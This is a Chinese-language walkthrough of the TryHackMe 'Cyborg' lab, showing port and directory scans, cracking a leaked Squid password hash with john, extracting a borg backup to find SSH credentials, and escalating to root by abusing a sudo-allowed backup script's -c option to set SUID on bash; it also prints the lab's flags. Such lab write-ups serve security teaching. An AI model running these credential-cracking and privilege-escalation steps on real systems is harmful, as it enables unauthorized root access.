乐趣区

关于安全:TryhackmeCyborg密码破解brog仓库析出文件sudo滥用可执行文件传参

服务发现

┌──(root💀kali)-[~/tryhackme/Cyborg]
└─# nmap -sV -Pn 10.10.56.66
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-10-09 10:32 EDT
Nmap scan report for 10.10.56.66
Host is up (0.31s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.80 seconds

爆破目录

┌──(root💀kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -u http://10.10.56.66 -e*

  _|. _ _  _  _  _ _|_    v0.4.2                                             
 (_||| _) (/_(_|| (_|)                                                      
                                                                             
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak                                                                    
HTTP method: GET | Threads: 30 | Wordlist size: 15492

Output File: /root/tryhackme/dirsearch/reports/10.10.56.66/_21-10-09_10-55-20.txt

Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-09_10-55-20.log

Target: http://10.10.56.66/

[10:55:21] Starting: 
[10:55:28] 400 -  302B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd            
[10:55:35] 403 -  275B  - /.ht_wsr.txt                                                                                                                                                                                                                                                                                            
[10:56:08] 301 -  308B  - /admin  ->  http://10.10.56.66/admin/                                                             
[10:56:10] 200 -    6KB - /admin/                                   
[10:56:11] 403 -  275B  - /admin/.htaccess                          
[10:56:11] 200 -    6KB - /admin/?/login                            
[10:56:11] 200 -    5KB - /admin/admin.html                         
[10:56:14] 200 -    6KB - /admin/                                                                                                                                    
[10:57:18] 301 -  306B  - /etc  ->  http://10.10.56.66/etc/                                                                                                                                                                                   
[10:57:18] 200 -  925B  - /etc/                                                                                                                                                                                                              
[10:57:31] 200 -   11KB - /index.html                                       
[10:58:14] 403 -  275B  - /server-status                                    
[10:58:14] 403 -  275B  - /server-status/ 

http://10.10.56.66/etc/squid/passwd 找到一个登陆凭证

music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

保留到本地,用 john 破解

┌──(root💀kali)-[~/tryhackme/Cyborg]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 
Created directory: /root/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
squidward        (music_archive)
1g 0:00:00:00 DONE (2021-10-09 10:43) 4.761g/s 185600p/s 185600c/s 185600C/s 112806..samantha5
Use the "--show" option to display all of the cracked passwords reliably
Session completed

失去登陆凭证:music_archive:squidward,然而无奈通过 ssh 登陆

在首页 dowmload 一个压缩包archiver.tar,解压后失去几个文件

┌──(root💀kali)-[~/…/home/field/dev/final_archive]
└─# ls
config  data  hints.5  index.5  integrity.5  nonce  README
                                                                                                                                                                                                                                             

查看 readme,这个是一个 brog 仓库

在 kali 本地装置 brog 当前,应用下面的明码析出文件一个 home 文件

┌──(root💀kali)-[~/…/Cyborg/home/field/dev]
└─# borg extract ./final_archive::music_archive
Enter passphrase for key /root/tryhackme/Cyborg/home/field/dev/final_archive: 
                                                                                                                                                                                                                                             
┌──(root💀kali)-[~/…/Cyborg/home/field/dev]
└─# ls
final_archive  home

找到 alex 的登录凭证:

┌──(root💀kali)-[~/…/dev/home/alex/Documents]
└─# cat note.txt  
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:S3cretP@s3

登录 alex 账号,拿到 user flag

┌──(root💀kali)-[~/tryhackme/Cyborg]
└─# ssh alex@10.10.56.66                                                                                                                                                                                                                130 ⨯
alex@10.10.56.66's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


27 packages can be updated.
0 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

alex@ubuntu:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
alex@ubuntu:~$ cat user.txt
flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}

查看本账户 root 权限

alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

咱们查看 backup.sh 的源代码

alex@ubuntu:~$ cat /etc/mp3backups/backup.sh
#!/bin/bash

sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt


input="/etc/mp3backups/backed_up_files.txt"
#while IFS= read -r line
#do
  #a="/etc/mp3backups/backed_up_files.txt"
#  b=$(basename $input)
  #echo
#  echo "$line"
#done < "$input"

while getopts c: flag
do
        case "${flag}" in 
                c) command=${OPTARG};;
        esac
done



backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"

# Where to backup to.
dest="/etc/mp3backups/"

# Create archive filename.
hostname=$(hostname -s)
archive_file="$hostname-scheduled.tgz"

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"

echo

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo
echo "Backup finished"

cmd=$($command)
echo $cmd

看源码是备份所有.mp3 文件
我一开始还认为是通过 tar 命令提权,因为如果一个文件的名字叫 xxx.mp3 --checkpoint=1 能够被执行的话,那就能够通过 tar 执行一个 shell,然而重复试了屡次还是不行

起初看大佬的 writeup,发现重点是在这段代码(我一开始没看明确这段是在表白什么,所以脱漏了这个提权点):

while getopts c: flag
do
        case "${flag}" in 
                c) command=${OPTARG};;
        esac
done

...
cmd=$($command)
echo $cmd

它实际上相当于接管一个 ”-c” 的命令,而后再执行这个命令,例如

alex@ubuntu:~/Music$ sudo /etc/mp3backups/backup.sh -c whoami

root

加 SUID 到 bash 命令,提权到 root

sudo /etc/mp3backups/backup.sh -c "chmod +s /bin/bash"
alex@ubuntu:~/Music$ bash -p
bash-4.3# whoami
root
bash-4.3# cat /root/root.txt 
flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}
退出移动版